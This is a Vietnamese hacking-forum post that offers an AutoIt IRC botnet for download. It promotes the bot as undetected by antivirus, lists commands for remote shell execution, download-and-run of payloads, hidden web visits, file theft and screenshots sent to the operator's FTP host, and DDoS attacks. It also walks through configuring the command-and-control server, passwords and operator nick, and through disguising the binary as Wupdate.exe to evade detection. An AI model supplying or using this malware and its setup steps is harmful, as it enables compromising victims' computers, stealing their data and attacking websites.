Link: http://virusvn.com/forum/showthread.php?p=10462#post10462
Vài Thông Tin Về Bot:
Nhược Điểm : Dung Lượng Khá Nặng (400kb),các bạn có thể khắc phục điều này bằng cách tạo 1 virus có chức năng download con bot của các bạn rồi bằng cách nào đó cho victim chạy nó,các bạn nao không có host mua thì có thể vào trang Ripway.com để reg nick,trang này cho phép up file exe.
Ưu điểm: Không hề có AV nào phát hiện.bảo mật khá tốt,con bot này có hai tầng pass đó là pass chanel và pass bot,còn một Ưu điểm nữa là các bạn có thể config để con bot chỉ nghe lệnh bạn khi bạn vào server irc với một nick định sẵn.VD : tôi config bot chỉ nghe lệnh người tôi nếu tôi vào server ỉc với nick Llykio thì nếu tôi login bằng Nick Khác thì dù biết pass channel và pass bot thì cũng không thể điều khiển dc.(Điều này đồng nghĩa với việc trong một lúc chỉ có một người điều khiển dc con bot của tôi ^^!)
Command:
Login password
cmd Dir Command (VD : cmd C: dir)
Chat msg ( cái này hok cần thiết cho lắm)
Info (cái này để xem thông tin máy zoombie)
Download link target (VD : Download http://kiolonely.co.cc/1.rar C:/1.rar)
* lưu ý: với lệnh download này,nếu file cần down là exe thì sau khi download bot sẽ run ngay file đó,còn các định dạng khác thì nó chỉ Download về máy victim rồi thôi.
abort (dừng lệnh download)
rundos command (cái này là lẹnh dùng để run các lệnh trong msdos,tôi không xóa lệnh này vì nghĩ các bạn sẽ cần nó,tuy nhiên bạn có thể dùng lẹnh cmd ở trên)
pl ( lệnh này dùng để liệt kê danh sách process)
pc tên process hoặc id process(VD : pc wupdate.exe)
Visit link ( VD: visit http://kiolonely.co.cc . lệnh này bắt zoombie chạy ẩn một trang web nào đó)
shutdown (cái này chỉ thêm vô cho có thôi)
Del file (VD : del C:/llykio.exe)
Copy file target
Move file target
Run file(chỉ run file thi hành thui,vd:exe,bat,com..)
Quit (thoát bot)
logout ( đây là lệnh quan trọng các bạn phải nhớ dùng khi không muốn điều khiển zoombie nữa)
OpenFTP Host User Pass Dir (lưu ý dir phải kết thúc bằng "/",lệnh này là cung cấp thông tin hót ftp của mình cho zoombie để get file từ máy zoombie và chụp ảnh màn hình)
Capscr tenfile.jpg
Getfile TenFile.xxx Dir ( VD : Getfile Llykio.exe C:/llykio.exe,như vậy thì khi vào host của tôi thì sẽ thấy file Llykio.exe ở thư mục mà khi tôi thực hiện lệnh OpenFTP đã cung cấp cho Zoombie)
*Lưu Ý: lệnh capscr và Getfile chỉ thực hiện dc khi Đã OpenFTP
DDOs host Target (VD: DDos Kiolonely.co.cc /index.php )
Stop (Dừng Lệnh DDos)
--Cách Config Bot
-File Wupdate.au3
Các Bạn Phải Sửa Link Để Bot Download File Info.php Về,Các Bạn Phải Upfile Ìno Lên Hai Host Khác Nhau Để Đề Phòng Host Die(cái này bạn nào xài host Free thì cẩn thận)
Dòng _IRCChangeMode ($sock, "+k 0905071341", $channel) (sửa dòng này để bot tạo pass cho channel,như ở trên thì pass là 0905071341)
Dòng if $pass = "Kioisme" Then (kioisme là pass bot của tôi)
Bạn Phải Sửa Toàn Bộ $user = "Llykio" thành Nick Của bạn khi vào server
irc ( nhớ đừng bỏ sót,nếu không bot sẽ không hoạt dộng như ý muốn của bạn)
Ngoài ra các bạn có thể sửa các Messenger nếu muốn
-File IRC.au3
TCPSend($irc, "JOIN " & $chan & " 0905071341" &@CRLF)
bạn phải đổi 0905071341 thành pass chanel mà bạn đã tạo trong file Wupdate.au3(đừng trở thành nạn nhân của chính mình ^^!)
OK--> Download Autoit và Compile nó(bạn phải dùng icon mặc đình của autoit nếu không muốn một vài AV phát hiện.)
* một Lưu Ý Cuối Cùng là bạn phải tạo bot thành file Wupdate.exe để process của bot có thể ẩn trong Taskmananger ( Tên file các bạn cũng có thể đỏi trong file Wupdate.au3)
Thôi! Nói Nhiều Quá.
Link Đây: http://www.megaupload.com/?d=Z707STEV
Mega
Rapid
Còn Nữa
Nội dung file Info.php
Code:
$ip = $_SERVER["REMOTE_ADDR"]
?>
[Information] Server=irc.lcirc.net Port=6667 Channel=#kio+is+me Version=1 ip=
